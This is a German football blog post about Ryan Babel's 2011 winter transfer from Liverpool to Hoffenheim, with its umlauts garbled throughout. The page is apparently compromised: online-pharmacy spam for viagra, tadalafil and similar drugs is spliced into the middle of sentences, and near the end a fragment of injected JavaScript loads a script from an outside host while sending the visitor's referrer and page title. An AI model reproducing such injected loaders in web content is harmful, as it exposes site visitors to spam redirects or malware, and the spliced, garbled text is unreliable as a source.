Willkommen auf » Wintertransfers 2011 – Ryan Babel
31. Jan 2011

Wintertransfers 2011 – Ryan Babel

Ein paar NeuzugAi??nge des Transferfensters im Winter 2011 gilt es noch zu beleuchten. Ganz oben auf meiner Liste steht Ryan Babel, FlA?gelstA?rmer, niederlAi??ndischer Nationalspieler, kommt fA?r 7 Millionen Euro AblAi??se vom FC Liverpool zu 1899 Hoffenheim, „Wunschsspieler fA?r die Offensive“ von Neu-Trainer Marco Pezzaiuoli. In der Angriffsreihe bestand nach dem unrA?hmlichen cheap silagra forum Pills snafi tadalafil 20mg. Pills cheap fucidin krem Abgang von Demba Ba durchaus Handlungsbedarf. Gemeinsam mit Boris Vukcevic, Peniel Mlapa und Chinedu Obasi soll Babel nun die AuAYen beackern und allen voran MittelstA?rmer Vedad Ibisevic mit Flanken fA?ttern.

FA?r sein Alter von 24 Jahren kommt er mit einer beeindruckenden internationalen Erfahrung daher. Bis 2007 spielte er 73 mal fA?r seinen Heimatklub Ajax Amsterdam, seitdem mit Liverpool 91 mal in der Premier League, 32 mal Champions League und 18 mal Europa League, obendrauf kommen noch 26 Junioren- und 40 A-LAi??nderspiele fA?r die Niederlande. Nicht schlecht, kann kaum ein Spieler seiner Altersgruppe vorweisen.

Seine Torausbeute lAi??sst einen dagegen auf den ersten Blick stutzen (in Amsterdam nur 14, in Liverpool 12 und in der Nationalelf 5 Treffer, bei der Anzahl an Spielen sollte fA?r einen StA?rmer eigentlich mehr drin sein), wurde ihm gegen Ende seiner Zeit in England auch durchaus vorgeworfen, seine spielerischen QualitAi??ten liegen aber eben woanders und dA?rften dem Hoffenheimer Spiel sehr zugute kommen. Babel gilt als pfeilschnell, technisch Ai??uAYerst beschlagen, durchsetzungsstark, ein idealer Konterspieler. Er wurde als klassischer niederlAi??ndischer AuAYenstA?rmer im Stil von Robben, Kuyt, van Persie, Elia und Co. ausgebildet und das merkt man ihm auch an. Aber wenn man ehrlich ist… den ganz groAYen Durchbruch hat er in dreieinhalb Jahren an der Seite von Fernando Torres und Steven Gerrard nicht geschafft. In Liverpool trauern ihm nur wenige hinterher.

Mein Fazit lautet aber dennoch: Babel ist ein erstklassiger Neuzugang fA?r die Hoffenheimer, er hat internationales Format, die AblAi??sesumme hielt sich in Grenzen, es ist mAi??chtig Potenzial vorhanden. Ich glaube das funktioniert in Hoffenheim, denn das ist genau sein Spiel.

[youtube:http://www.youtube.com/watch?v=Hu41FiOJAmU]

Noch ein Kuriosum am Rande: Babel ist einer der wenigen FuAYballprofis, die aktiv selber twittern (@RyanBabel). Die lockere Art und Weise, in der er da auch seinen sportlichen Alltag kommentierte, fA?hrten Anfang des Jahres allerdings dazu, dass sein bereits angekratztes Image in England weiter litt und sich ein Abschied deutlich anbahnte. Nach einer Niederlage seines FC Liverpool gegen Manchester United im FA-Cup penegra 50 price in india Buy Ai??uAYerte er sich z.B. abfAi??llig A?ber Schiedsrichter Howard Webb und photoshoppte ihn ins ManU-Trikot. Von der FA flatterte daraufhin eine saftige Geldstrafe ins Haus. Bin gespannt, ob er sich die offenherzige Kommunikation auch in der Bundesliga beibehAi??lt ;)s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “; Cheap pravastatin sodium 40 Cheap Pills online Cheap rx approved viagra. global drug supply buy online pharmacy soma. , viagra 50mg vs 100mg.


Einen Kommentar schreiben